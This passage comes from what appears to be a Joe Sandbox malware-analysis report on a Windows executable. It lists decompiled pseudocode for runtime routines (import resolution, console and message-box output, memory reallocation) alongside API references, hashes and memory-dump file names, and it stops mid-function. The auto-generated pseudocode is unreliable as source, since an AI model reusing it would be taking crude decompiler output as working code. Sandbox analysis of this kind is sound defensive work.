                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressCloseHandleModuleProc
                                                                                                                            • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                                                            • API String ID: 4190037839-2401316094
                                                                                                                            • Opcode ID: 0c53a133d6644a1b94ef3c959f72937b5652b11bdcaf1ce6cf384129006bdbe5
                                                                                                                            • Instruction ID: 05790bdd6973bc135d390eb6e5b6569f0703c8ea8b4006eead18837270f0a894
                                                                                                                            • Opcode Fuzzy Hash: 0c53a133d6644a1b94ef3c959f72937b5652b11bdcaf1ce6cf384129006bdbe5
                                                                                                                            • Instruction Fuzzy Hash: 39217930B00228ABDB10EEB5DD42A9F73F4EB44345FA04477A500E3281DB7CAB41962D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040D218 Relevance: 13.8, APIs: 9, Instructions: 258COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 67%
                                                                                                                            			E0040D218(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				long _v8;
				signed int _v12;
				long _v16;
				void* _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				struct HINSTANCE__** _v48;
				CHAR* _v52;
				void _v56;
				long _v60;
				_Unknown_base(*)()* _v64;
				struct HINSTANCE__* _v68;
				CHAR* _v72;
				signed int _v76;
				CHAR* _v80;
				intOrPtr* _v84;
				void* _v88;
				void _v92;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				long _t113;
				intOrPtr* _t119;
				void* _t124;
				void _t126;
				long _t128;
				struct HINSTANCE__* _t142;
				long _t166;
				signed int* _t190;
				_Unknown_base(*)()* _t191;
				void* _t194;
				intOrPtr _t196;

				_push(_a4);
				memcpy( &_v56, 0x4b7c40, 8 << 2);
				_pop(_t194);
				_v56 =  *0x4b7c40;
				_v52 = E0040D6C8( *0x004B7C44);
				_v48 = E0040D6D8( *0x004B7C48);
				_v44 = E0040D6E8( *0x004B7C4C);
				_v40 = E0040D6F8( *0x004B7C50);
				_v36 = E0040D6F8( *0x004B7C54);
				_v32 = E0040D6F8( *0x004B7C58);
				_v28 =  *0x004B7C5C;
				memcpy( &_v92, 0x4b7c60, 9 << 2);
				_t196 = _t194;
				_v88 = 0x4b7c60;
				_v84 = _a8;
				_v80 = _v52;
				if((_v56 & 0x00000001) == 0) {
					_t166 =  *0x4b7c84; // 0x0
					_v8 = _t166;
					_v8 =  &_v92;
					RaiseException(0xc06d0057, 0, 1,  &_v8);
					return 0;
				}
				_t104 = _a8 - _v44;
				_t142 =  *_v48;
				if(_t104 < 0) {
					_t104 = _t104 + 3;
				}
				_v12 = _t104 >> 2;
				_t106 = _v12;
				_t190 = (_t106 << 2) + _v40;
				_t108 = (_t106 & 0xffffff00 | (_t190[0] & 0x00000080) == 0x00000000) & 0x00000001;
				_v76 = _t108;
				if(_t108 == 0) {
					_v72 =  *_t190 & 0x0000ffff;
				} else {
					_v72 = E0040D708( *_t190) + 2;
				}
				_t191 = 0;
				if( *0x4be640 == 0) {
					L10:
					if(_t142 != 0) {
						L25:
						_v68 = _t142;
						if( *0x4be640 != 0) {
							_t191 =  *0x4be640(2,  &_v92);
						}
						if(_t191 != 0) {
							L36:
							if(_t191 == 0) {
								_v60 = GetLastError();
								if( *0x4be644 != 0) {
									_t191 =  *0x4be644(4,  &_v92);
								}
								if(_t191 == 0) {
									_t113 =  *0x4b7c8c; // 0x0
									_v24 = _t113;
									_v24 =  &_v92;
									RaiseException(0xc06d007f, 0, 1,  &_v24);
									_t191 = _v64;
								}
							}
							goto L41;
						} else {
							if( *((intOrPtr*)(_t196 + 0x14)) == 0 ||  *((intOrPtr*)(_t196 + 0x1c)) == 0) {
								L35:
								_t191 = GetProcAddress(_t142, _v72);
								goto L36;
							} else {
								_t119 =  *((intOrPtr*)(_t142 + 0x3c)) + _t142;
								if( *_t119 != 0x4550 ||  *((intOrPtr*)(_t119 + 8)) != _v28 || (( *(_t119 + 0x34) & 0xffffff00 |  *(_t119 + 0x34) == _t142) & 0x00000001) == 0) {
									goto L35;
								} else {
									_t191 =  *((intOrPtr*)(_v36 + _v12 * 4));
									if(_t191 == 0) {
										goto L35;
									}
									L41:
									 *_a8 = _t191;
									goto L42;
								}
							}
						}
					}
					if( *0x4be640 != 0) {
						_t142 =  *0x4be640(1,  &_v92);
					}
					if(_t142 == 0) {
						_t142 = LoadLibraryA(_v80);
					}
					if(_t142 != 0) {
						L20:
						if(_t142 == E0040CBA0(_v48, _t142)) {
							FreeLibrary(_t142);
						} else {
							if( *((intOrPtr*)(_t196 + 0x18)) != 0) {
								_t124 = LocalAlloc(0x40, 8);
								_v20 = _t124;
								if(_t124 != 0) {
									 *((intOrPtr*)(_v20 + 4)) = _t196;
									_t126 =  *0x4b7c3c; // 0x0
									 *_v20 = _t126;
									 *0x4b7c3c = _v20;
								}
							}
						}
						goto L25;
					} else {
						_v60 = GetLastError();
						if( *0x4be644 != 0) {
							_t142 =  *0x4be644(3,  &_v92);
						}
						if(_t142 != 0) {
							goto L20;
						} else {
							_t128 =  *0x4b7c88; // 0x0
							_v16 = _t128;
							_v16 =  &_v92;
							RaiseException(0xc06d007e, 0, 1,  &_v16);
							return _v64;
						}
					}
				} else {
					_t191 =  *0x4be640(0,  &_v92);
					if(_t191 == 0) {
						goto L10;
					} else {
						L42:
						if( *0x4be640 != 0) {
							_v60 = 0;
							_v68 = _t142;
							_v64 = _t191;
							 *0x4be640(5,  &_v92);
						}
						return _t191;
					}
				}
			}







































                                                                                                                            0x0040d22c
                                                                                                                            0x0040d232
                                                                                                                            0x0040d234
                                                                                                                            0x0040d237
                                                                                                                            0x0040d244
                                                                                                                            0x0040d251
                                                                                                                            0x0040d25e
                                                                                                                            0x0040d26b
                                                                                                                            0x0040d278
                                                                                                                            0x0040d285
                                                                                                                            0x0040d28e
                                                                                                                            0x0040d29c
                                                                                                                            0x0040d29e
                                                                                                                            0x0040d29f
                                                                                                                            0x0040d2a5
                                                                                                                            0x0040d2ab
                                                                                                                            0x0040d2b2
                                                                                                                            0x0040d2b4
                                                                                                                            0x0040d2ba
                                                                                                                            0x0040d2c0
                                                                                                                            0x0040d2d0
                                                                                                                            0x00000000
                                                                                                                            0x0040d2d5
                                                                                                                            0x0040d2e2
                                                                                                                            0x0040d2e7
                                                                                                                            0x0040d2e9
                                                                                                                            0x0040d2eb
                                                                                                                            0x0040d2eb
                                                                                                                            0x0040d2f1
                                                                                                                            0x0040d2f4
                                                                                                                            0x0040d2fc
                                                                                                                            0x0040d306
                                                                                                                            0x0040d309
                                                                                                                            0x0040d30e
                                                                                                                            0x0040d329
                                                                                                                            0x0040d310
                                                                                                                            0x0040d31c
                                                                                                                            0x0040d31c
                                                                                                                            0x0040d32c
                                                                                                                            0x0040d335
                                                                                                                            0x0040d34e
                                                                                                                            0x0040d350
                                                                                                                            0x0040d412
                                                                                                                            0x0040d412
                                                                                                                            0x0040d41c
                                                                                                                            0x0040d42a
                                                                                                                            0x0040d42a
                                                                                                                            0x0040d42e
                                                                                                                            0x0040d47b
                                                                                                                            0x0040d47d
                                                                                                                            0x0040d484
                                                                                                                            0x0040d48e
                                                                                                                            0x0040d49c
                                                                                                                            0x0040d49c
                                                                                                                            0x0040d4a0
                                                                                                                            0x0040d4a2
                                                                                                                            0x0040d4a7
                                                                                                                            0x0040d4ad
                                                                                                                            0x0040d4bd
                                                                                                                            0x0040d4c2
                                                                                                                            0x0040d4c2
                                                                                                                            0x0040d4a0
                                                                                                                            0x00000000
                                                                                                                            0x0040d430
                                                                                                                            0x0040d434
                                                                                                                            0x0040d46f
                                                                                                                            0x0040d479
                                                                                                                            0x00000000
                                                                                                                            0x0040d43c
                                                                                                                            0x0040d43f
                                                                                                                            0x0040d447
                                                                                                                            0x00000000
                                                                                                                            0x0040d460
                                                                                                                            0x0040d466
                                                                                                                            0x0040d46b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040d4c5
                                                                                                                            0x0040d4c8
                                                                                                                            0x00000000
                                                                                                                            0x0040d4c8
                                                                                                                            0x0040d447
                                                                                                                            0x0040d434
                                                                                                                            0x0040d42e
                                                                                                                            0x0040d35d
                                                                                                                            0x0040d36b
                                                                                                                            0x0040d36b
                                                                                                                            0x0040d36f
                                                                                                                            0x0040d37a
                                                                                                                            0x0040d37a
                                                                                                                            0x0040d37e
                                                                                                                            0x0040d3cb
                                                                                                                            0x0040d3d7
                                                                                                                            0x0040d40d
                                                                                                                            0x0040d3d9
                                                                                                                            0x0040d3dd
                                                                                                                            0x0040d3e3
                                                                                                                            0x0040d3e8
                                                                                                                            0x0040d3ed
                                                                                                                            0x0040d3f4
                                                                                                                            0x0040d3fa
                                                                                                                            0x0040d3ff
                                                                                                                            0x0040d404
                                                                                                                            0x0040d404
                                                                                                                            0x0040d3ed
                                                                                                                            0x0040d3dd
                                                                                                                            0x00000000
                                                                                                                            0x0040d380
                                                                                                                            0x0040d385
                                                                                                                            0x0040d38f
                                                                                                                            0x0040d39d
                                                                                                                            0x0040d39d
                                                                                                                            0x0040d3a1
                                                                                                                            0x00000000
                                                                                                                            0x0040d3a3
                                                                                                                            0x0040d3a3
                                                                                                                            0x0040d3a8
                                                                                                                            0x0040d3ae
                                                                                                                            0x0040d3be
                                                                                                                            0x00000000
                                                                                                                            0x0040d3c3
                                                                                                                            0x0040d3a1
                                                                                                                            0x0040d337
                                                                                                                            0x0040d343
                                                                                                                            0x0040d347
                                                                                                                            0x00000000
                                                                                                                            0x0040d349
                                                                                                                            0x0040d4ca
                                                                                                                            0x0040d4d1
                                                                                                                            0x0040d4d5
                                                                                                                            0x0040d4d8
                                                                                                                            0x0040d4db
                                                                                                                            0x0040d4e4
                                                                                                                            0x0040d4e4
                                                                                                                            0x00000000
                                                                                                                            0x0040d4ea
                                                                                                                            0x0040d347

                                                                                                                            APIs
                                                                                                                            • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0040D2D0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionRaise
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3997070919-0
                                                                                                                            • Opcode ID: 4fdbadfbff537c598349848257c7330453a14fb024132e1a583ffc8385a63ee1
                                                                                                                            • Instruction ID: 6bdc8742f8c12d3c05e6aa795b4e0fa0c425ed74332de7fca684440f38d882f1
                                                                                                                            • Opcode Fuzzy Hash: 4fdbadfbff537c598349848257c7330453a14fb024132e1a583ffc8385a63ee1
                                                                                                                            • Instruction Fuzzy Hash: 7CA16F75D002089FDB14DFE9D881BAEB7B5BB88300F14423AE505B73C1DB78A949CB59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004047B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 72%
                                                                                                                            			E004047B0(int __eax, void* __ecx, void* __edx) {
				long _v12;
				int _t4;
				long _t7;
				void* _t11;
				long _t12;
				void* _t13;
				long _t18;

				_t4 = __eax;
				_t24 = __edx;
				_t20 = __eax;
				if( *0x4bb058 == 0) {
					_push(0x2010);
					_push(__edx);
					_push(__eax);
					_push(0);
					L00403780();
				} else {
					_t7 = E00407EF0(__edx);
					WriteFile(GetStdHandle(0xfffffff4), _t24, _t7,  &_v12, 0);
					_t11 =  *0x4b7078; // 0x403920
					_t12 = E00407EF0(_t11);
					_t13 =  *0x4b7078; // 0x403920
					WriteFile(GetStdHandle(0xfffffff4), _t13, _t12,  &_v12, 0);
					_t18 = E00407EF0(_t20);
					_t4 = WriteFile(GetStdHandle(0xfffffff4), _t20, _t18,  &_v12, 0);
				}
				return _t4;
			}










                                                                                                                            0x004047b0
                                                                                                                            0x004047b3
                                                                                                                            0x004047b5
                                                                                                                            0x004047be
                                                                                                                            0x00404821
                                                                                                                            0x00404826
                                                                                                                            0x00404827
                                                                                                                            0x00404828
                                                                                                                            0x0040482a
                                                                                                                            0x004047c0
                                                                                                                            0x004047c9
                                                                                                                            0x004047d8
                                                                                                                            0x004047e4
                                                                                                                            0x004047e9
                                                                                                                            0x004047ef
                                                                                                                            0x004047fd
                                                                                                                            0x0040480b
                                                                                                                            0x0040481a
                                                                                                                            0x0040481a
                                                                                                                            0x00404832

                                                                                                                            APIs
                                                                                                                            • GetStdHandle.KERNEL32(000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047D2
                                                                                                                            • WriteFile.KERNEL32(00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047D8
                                                                                                                            • GetStdHandle.KERNEL32(000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047F7
                                                                                                                            • WriteFile.KERNEL32(00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047FD
                                                                                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?), ref: 00404814
                                                                                                                            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000), ref: 0040481A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileHandleWrite
                                                                                                                            • String ID: 9@
                                                                                                                            • API String ID: 3320372497-3209974744
                                                                                                                            • Opcode ID: 5f8d133322f34133c732956f1222a9d0eafcb790ac979970e9ef56a2ae19cd1b
                                                                                                                            • Instruction ID: 9b3b4e35e49a927b8991458b20a1a8ec0ccf5b925403b1971dfbe1b0899ab5f0
                                                                                                                            • Opcode Fuzzy Hash: 5f8d133322f34133c732956f1222a9d0eafcb790ac979970e9ef56a2ae19cd1b
                                                                                                                            • Instruction Fuzzy Hash: 2001AEE25492103DE110F7A69C85F57168C8B4472AF10467F7218F35D2C9395D44927E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041F0F4 Relevance: 12.1, APIs: 8, Instructions: 97filewindowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 62%
                                                                                                                            			E0041F0F4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				char* _v8;
				long _v12;
				short _v140;
				short _v2188;
				void* _t15;
				char* _t17;
				intOrPtr _t19;
				intOrPtr _t30;
				long _t48;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t61;
				void* _t64;

				_push(__ebx);
				_push(__esi);
				_v8 = 0;
				_push(_t64);
				_push(0x41f219);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t64 + 0xfffff778;
				_t61 = E0041EEFC(_t15, __ebx,  &_v2188, __edx, __edi, __esi, 0x400);
				_t17 =  *0x4ba6c0; // 0x4bb058
				if( *_t17 == 0) {
					_t19 =  *0x4ba4f8; // 0x40e710
					_t11 = _t19 + 4; // 0xffed
					LoadStringW(E00409FF0( *0x4be634),  *_t11,  &_v140, 0x40);
					MessageBoxW(0,  &_v2188,  &_v140, 0x2010);
				} else {
					_t30 =  *0x4ba524; // 0x4bb340
					E00405564(E00405820(_t30));
					_t48 = WideCharToMultiByte(1, 0,  &_v2188, _t61, 0, 0, 0, 0);
					_push(_t48);
					E00409C00();
					WideCharToMultiByte(1, 0,  &_v2188, _t61, _v8, _t48, 0, 0);
					WriteFile(GetStdHandle(0xfffffff4), _v8, _t48,  &_v12, 0);
					WriteFile(GetStdHandle(0xfffffff4), 0x41f234, 2,  &_v12, 0);
				}
				_pop(_t56);
				 *[fs:eax] = _t56;
				_push(0x41f220);
				_t57 =  *0x41f0c4; // 0x41f0c8
				return E00409D24( &_v8, _t57);
			}
















                                                                                                                            0x0041f0fd
                                                                                                                            0x0041f0fe
                                                                                                                            0x0041f101
                                                                                                                            0x0041f106
                                                                                                                            0x0041f107
                                                                                                                            0x0041f10c
                                                                                                                            0x0041f10f
                                                                                                                            0x0041f122
                                                                                                                            0x0041f124
                                                                                                                            0x0041f12c
                                                                                                                            0x0041f1ca
                                                                                                                            0x0041f1cf
                                                                                                                            0x0041f1de
                                                                                                                            0x0041f1f8
                                                                                                                            0x0041f132
                                                                                                                            0x0041f132
                                                                                                                            0x0041f13c
                                                                                                                            0x0041f15a
                                                                                                                            0x0041f15c
                                                                                                                            0x0041f16b
                                                                                                                            0x0041f188
                                                                                                                            0x0041f1a0
                                                                                                                            0x0041f1ba
                                                                                                                            0x0041f1ba
                                                                                                                            0x0041f1ff
                                                                                                                            0x0041f202
                                                                                                                            0x0041f205
                                                                                                                            0x0041f20d
                                                                                                                            0x0041f218

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0041EEFC: VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F0A8), ref: 0041EF2F
                                                                                                                              • Part of subcall function 0041EEFC: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF53
                                                                                                                              • Part of subcall function 0041EEFC: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF6E
                                                                                                                              • Part of subcall function 0041EEFC: LoadStringW.USER32(00000000,0000FFEC,?,00000100), ref: 0041F009
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,00000400,00000000,0041F219), ref: 0041F155
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F188
                                                                                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F19A
                                                                                                                            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F1A0
                                                                                                                            • GetStdHandle.KERNEL32(000000F4,0041F234,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?), ref: 0041F1B4
                                                                                                                            • WriteFile.KERNEL32(00000000,000000F4,0041F234,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000), ref: 0041F1BA
                                                                                                                            • LoadStringW.USER32(00000000,0000FFED,?,00000040), ref: 0041F1DE
                                                                                                                            • MessageBoxW.USER32(00000000,?,?,00002010), ref: 0041F1F8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$ByteCharHandleLoadModuleMultiNameStringWideWrite$MessageQueryVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 135118572-0
                                                                                                                            • Opcode ID: 7bf27a680bd44ec5315003c7bd75f7b580991028cc1534cfff61cb99441fed85
                                                                                                                            • Instruction ID: 441773961034998e17761d3334fa1b60ae8bad0ad03d42d5622a75f3c8f76c28
                                                                                                                            • Opcode Fuzzy Hash: 7bf27a680bd44ec5315003c7bd75f7b580991028cc1534cfff61cb99441fed85
                                                                                                                            • Instruction Fuzzy Hash: 7D31CF75640204BFE714E796CC42FDA77ACEB08704F9044BABA04F71D2DA786E548B6D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404464 Relevance: 10.9, APIs: 7, Instructions: 406COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 88%
                                                                                                                            			E00404464(signed int __eax, intOrPtr __edx, void* __edi) {
				signed int __ebx;
				void* __esi;
				signed int _t69;
				signed int _t78;
				signed int _t93;
				long _t94;
				void* _t100;
				signed int _t102;
				signed int _t109;
				signed int _t115;
				signed int _t123;
				signed int _t129;
				void* _t131;
				signed int _t140;
				unsigned int _t148;
				signed int _t150;
				long _t152;
				signed int _t156;
				intOrPtr _t161;
				signed int _t166;
				signed int _t170;
				unsigned int _t171;
				intOrPtr _t174;
				intOrPtr _t192;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t205;
				unsigned int _t207;
				intOrPtr _t213;
				void* _t225;
				intOrPtr _t227;
				void* _t228;
				signed int _t230;
				void* _t232;
				signed int _t233;
				signed int _t234;
				signed int _t238;
				signed int _t241;
				void* _t243;
				intOrPtr* _t244;

				_t176 = __edx;
				_t66 = __eax;
				_t166 =  *(__eax - 4);
				_t217 = __eax;
				if((_t166 & 0x00000007) != 0) {
					__eflags = _t166 & 0x00000005;
					if((_t166 & 0x00000005) != 0) {
						_pop(_t217);
						_pop(_t145);
						__eflags = _t166 & 0x00000003;
						if((_t166 & 0x00000003) == 0) {
							_push(_t145);
							_push(__eax);
							_push(__edi);
							_push(_t225);
							_t244 = _t243 + 0xffffffe0;
							_t218 = __edx;
							_t202 = __eax;
							_t69 =  *(__eax - 4);
							_t148 = (0xfffffff0 & _t69) - 0x14;
							if(0xfffffff0 >= __edx) {
								__eflags = __edx - _t148 >> 1;
								if(__edx < _t148 >> 1) {
									_t150 = E00403EE8(__edx);
									__eflags = _t150;
									if(_t150 != 0) {
										__eflags = _t218 - 0x40a2c;
										if(_t218 > 0x40a2c) {
											_t78 = _t202 - 0x10;
											__eflags = _t78;
											 *((intOrPtr*)(_t78 + 8)) = _t218;
										}
										E00403AA4(_t202, _t218, _t150);
										E0040426C(_t202, _t202, _t225);
									}
								} else {
									_t150 = __eax;
									 *((intOrPtr*)(__eax - 0x10 + 8)) = __edx;
								}
							} else {
								if(0xfffffff0 <= __edx) {
									_t227 = __edx;
								} else {
									_t227 = 0xbadb9d;
								}
								 *_t244 = _t202 - 0x10 + (_t69 & 0xfffffff0);
								VirtualQuery( *(_t244 + 8), _t244 + 8, 0x1c);
								if( *((intOrPtr*)(_t244 + 0x14)) != 0x10000) {
									L12:
									_t150 = E00403EE8(_t227);
									__eflags = _t150;
									if(_t150 != 0) {
										__eflags = _t227 - 0x40a2c;
										if(_t227 > 0x40a2c) {
											_t93 = _t150 - 0x10;
											__eflags = _t93;
											 *((intOrPtr*)(_t93 + 8)) = _t218;
										}
										E00403A74(_t202,  *((intOrPtr*)(_t202 - 0x10 + 8)), _t150);
										E0040426C(_t202, _t202, _t227);
									}
								} else {
									 *(_t244 + 0x10) =  *(_t244 + 0x10) & 0xffff0000;
									_t94 =  *(_t244 + 0x10);
									if(_t218 - _t148 >= _t94) {
										goto L12;
									} else {
										_t152 = _t227 - _t148 + 0x00010000 - 0x00000001 & 0xffff0000;
										if(_t94 < _t152) {
											_t152 = _t94;
										}
										if(VirtualAlloc( *(_t244 + 0xc), _t152, 0x2000, 4) == 0 || VirtualAlloc( *(_t244 + 0xc), _t152, 0x1000, 4) == 0) {
											goto L12;
										} else {
											_t100 = _t202 - 0x10;
											 *((intOrPtr*)(_t100 + 8)) = _t218;
											 *(_t100 + 0xc) = _t152 +  *(_t100 + 0xc) | 0x00000008;
											_t150 = _t202;
										}
									}
								}
							}
							return _t150;
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						_t170 = _t166 & 0xfffffff0;
						_push(__edi);
						_t205 = _t170 + __eax;
						_t171 = _t170 - 4;
						_t156 = _t166 & 0x0000000f;
						__eflags = __edx - _t171;
						_push(_t225);
						if(__edx > _t171) {
							_t102 =  *(_t205 - 4);
							__eflags = _t102 & 0x00000001;
							if((_t102 & 0x00000001) == 0) {
								L75:
								asm("adc edi, 0xffffffff");
								_t228 = ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176;
								_t207 = _t171;
								_t109 = E00403EE8(((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176);
								_t192 = _t176;
								__eflags = _t109;
								if(_t109 == 0) {
									goto L73;
								} else {
									__eflags = _t228 - 0x40a2c;
									if(_t228 > 0x40a2c) {
										 *((intOrPtr*)(_t109 - 8)) = _t192;
									}
									_t230 = _t109;
									E00403A74(_t217, _t207, _t109);
									E0040426C(_t217, _t207, _t230);
									return _t230;
								}
							} else {
								_t115 = _t102 & 0xfffffff0;
								_t232 = _t171 + _t115;
								__eflags = __edx - _t232;
								if(__edx > _t232) {
									goto L75;
								} else {
									__eflags =  *0x4bb059;
									if(__eflags == 0) {
										L66:
										__eflags = _t115 - 0xb30;
										if(_t115 >= 0xb30) {
											E00403AC0(_t205);
											_t176 = _t176;
											_t171 = _t171;
										}
										asm("adc edi, 0xffffffff");
										_t123 = (_t176 + ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + 0x000000d3 & 0xffffff00) + 0x30;
										_t195 = _t232 + 4 - _t123;
										__eflags = _t195;
										if(_t195 > 0) {
											 *(_t217 + _t232 - 4) = _t195;
											 *((intOrPtr*)(_t217 - 4 + _t123)) = _t195 + 3;
											_t233 = _t123;
											__eflags = _t195 - 0xb30;
											if(_t195 >= 0xb30) {
												__eflags = _t123 + _t217;
												E00403B00(_t123 + _t217, _t171, _t195);
											}
										} else {
											 *(_t217 + _t232) =  *(_t217 + _t232) & 0xfffffff7;
											_t233 = _t232 + 4;
										}
										_t234 = _t233 | _t156;
										__eflags = _t234;
										 *(_t217 - 4) = _t234;
										 *0x4bbae8 = 0;
										_t109 = _t217;
										L73:
										return _t109;
									} else {
										while(1) {
											asm("lock cmpxchg [0x4bbae8], ah");
											if(__eflags == 0) {
												break;
											}
											asm("pause");
											__eflags =  *0x4bb989;
											if(__eflags != 0) {
												continue;
											} else {
												Sleep(0);
												_t176 = _t176;
												_t171 = _t171;
												asm("lock cmpxchg [0x4bbae8], ah");
												if(__eflags != 0) {
													Sleep(0xa);
													_t176 = _t176;
													_t171 = _t171;
													continue;
												}
											}
											break;
										}
										_t156 = 0x0000000f &  *(_t217 - 4);
										_t129 =  *(_t205 - 4);
										__eflags = _t129 & 0x00000001;
										if((_t129 & 0x00000001) == 0) {
											L74:
											 *0x4bbae8 = 0;
											goto L75;
										} else {
											_t115 = _t129 & 0xfffffff0;
											_t232 = _t171 + _t115;
											__eflags = _t176 - _t232;
											if(_t176 > _t232) {
												goto L74;
											} else {
												goto L66;
											}
										}
									}
								}
							}
						} else {
							__eflags = __edx + __edx - _t171;
							if(__edx + __edx < _t171) {
								__eflags = __edx - 0xb2c;
								if(__edx >= 0xb2c) {
									L41:
									_t32 = _t176 + 0xd3; // 0xbff
									_t238 = (_t32 & 0xffffff00) + 0x30;
									_t174 = _t171 + 4 - _t238;
									__eflags =  *0x4bb059;
									if(__eflags != 0) {
										while(1) {
											asm("lock cmpxchg [0x4bbae8], ah");
											if(__eflags == 0) {
												break;
											}
											asm("pause");
											__eflags =  *0x4bb989;
											if(__eflags != 0) {
												continue;
											} else {
